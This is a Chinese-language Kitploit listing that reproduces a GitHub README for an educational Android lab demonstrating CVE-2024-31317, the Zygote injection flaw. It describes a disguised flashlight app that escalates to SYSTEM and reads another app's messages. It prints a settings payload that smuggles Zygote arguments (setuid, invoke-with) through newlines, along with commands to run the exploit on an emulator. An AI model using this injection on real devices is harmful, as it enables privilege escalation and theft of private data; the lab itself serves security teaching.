Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ZygoteExploitDemo — CVE-2024-31317 Zygote注入漏洞在Android上的教学演示 | Kitploit
工具/GitHubGitHub/gitamans/zygoteexploitdemo
Android安全权限提升漏洞分析漏洞利用移动应用渗透测试渗透测试移动安全学习与教育二进制利用实验室与实践
GitHubgitamans/zygoteexploitdemo

ZygoteExploitDemo

22106个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-31317 Zygote注入漏洞在Android上的教学演示

查看仓库

🔥 ZygoteExploitDemo - CVE-2024-31317 Android 安全实验室

🚨 Android Zygote 注入漏洞的教育演示

GitHub stars GitHub forks GitHub license


📋 概述

本实验室演示了 CVE-2024-31317,这是一个严重的 Android 漏洞,允许恶意应用将权限提升至 SYSTEM 级别 (UID 1000),并绕过 Android 沙箱实时读取其他应用的数据。

🎯 本演示展示的内容

阶段描述图示
1用户安装看似无害的“Flashlight Pro”应用🔦
2应用利用 CVE-2024-31317 获取 SYSTEM 访问权限💉
3SYSTEM 级服务读取“SecureChat”消息👁️
4被盗消息显示在实时仪表盘上📊

🏗️ 项目结构

root@kitploit:~
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # 受害者应用 (Jetpack Compose)
│   │   ├── 存储在 SQLite 中的加密消息
│   │   └── 模拟 WhatsApp 风格的加密
│   │
│   ├── FlashlightPro/           # 包含漏洞利用的恶意应用
│   │   ├── 正常的手电筒 UI (干扰项)
│   │   ├── 后台漏洞利用服务
│   │   └── WRITE_SECURE_SETTINGS 权限
│   │
│   └── MonitorService/          # SYSTEM 级读取器
│       ├── 漏洞利用后以 UID 1000 运行
│       ├── 读取 SecureChat 数据库
│       └── 将数据外泄至仪表盘
│
├── 📊 dashboard/                # Flask Web 仪表盘
│   └── app.py                   # 实时显示被盗消息
│
├── 📜 scripts/                  # 自动化脚本
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # 漏洞利用信息
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # 代码模板
    ├── exploit_template.java
    └── dashboard_template.html

🔧 技术细节

漏洞说明

CVE-2024-31317 存在于 Android Zygote 进程处理 hidden_api_blacklist_exemptions 系统设置的方式中。由于缺少输入清理,攻击者可以注入换行符以向 Zygote 命令添加任意参数。

攻击向量:

root@kitploit:~
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // 以 SYSTEM 身份运行
    "--setgid=1000\n" +     // 以 SYSTEM 组身份运行
    "--invoke-with\n" +
    "am start-service ...;\n"
);

受影响版本

版本状态
Android 9 - 14❌ 易受攻击(2024年6月补丁之前)
Android 14+✅ 已修复(2024年6月安全更新)
Android 15+✅ 安全

🚀 快速入门指南

前提条件

  • ✅ Android Studio(最新版)
  • ✅ Python 3.8+ 及 Flask
  • ✅ Android SDK 及平台工具
  • ✅ 模拟器可用磁盘空间 10GB

第1步:克隆仓库

root@kitploit:~
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo

第2步:设置存在漏洞的模拟器

root@kitploit:~
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# 启动模拟器
emulator -avd vulnerable_android_12

第3步:构建并安装应用

root@kitploit:~
# 在新终端中
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

第4步:启动仪表盘

root@kitploit:~
cd ../dashboard
pip3 install flask flask-cors
python3 app.py

📱 在浏览器中打开 http://localhost:5000

第5步:运行漏洞利用

root@kitploit:~
cd ../scripts
python3 run_exploit.py

第6步:见证奇迹 ✨

  1. 在模拟器中打开 SecureChat 应用
  2. 发送一些测试消息
  3. 在仪表盘上 即时 查看它们!🔴

📸 演示视频

🎬 演示视频即将推出


🔬 工作原理 - 逐步说明

  1. FlashlightPro 请求 WRITE_SECURE_SETTINGS 权限
  2. 漏洞利用代码将恶意载荷注入 Zygote 设置
  3. Zygote 以 SYSTEM 特权(UID 1000)启动 MonitorService
  4. SYSTEM 服务绕过 Android 沙箱限制
  5. 直接读取 /data/data/com.securechat/databases/ 中的数据库
  6. 通过 HTTP POST 将数据外泄至 Flask 仪表盘
  7. 实时显示被盗的加密消息

📚 学习资源

  • Android 安全公告
  • CVE-2024-31317 详情
  • CleoV2 的原始 PoC

🤝 贡献指南

欢迎贡献!请:

  1. Fork 本仓库
  2. 创建功能分支
  3. 提交 Pull Request

可贡献的领域:

  • 🎯 额外的漏洞利用载荷
  • 🛡️ 更好的检测方法
  • 📖 改进文档
  • 🌍 翻译成其他语言

📄 许可证

MIT 许可证 - 详见 LICENSE 文件


👨‍💻 作者

Aman - @GitAmanS


⭐ 支持

如果您觉得本演示具有教育意义,请给它一个星标!⭐


由安全研究员为安全研究员制作

记住:能力越大,责任越大 🕷️

下载工具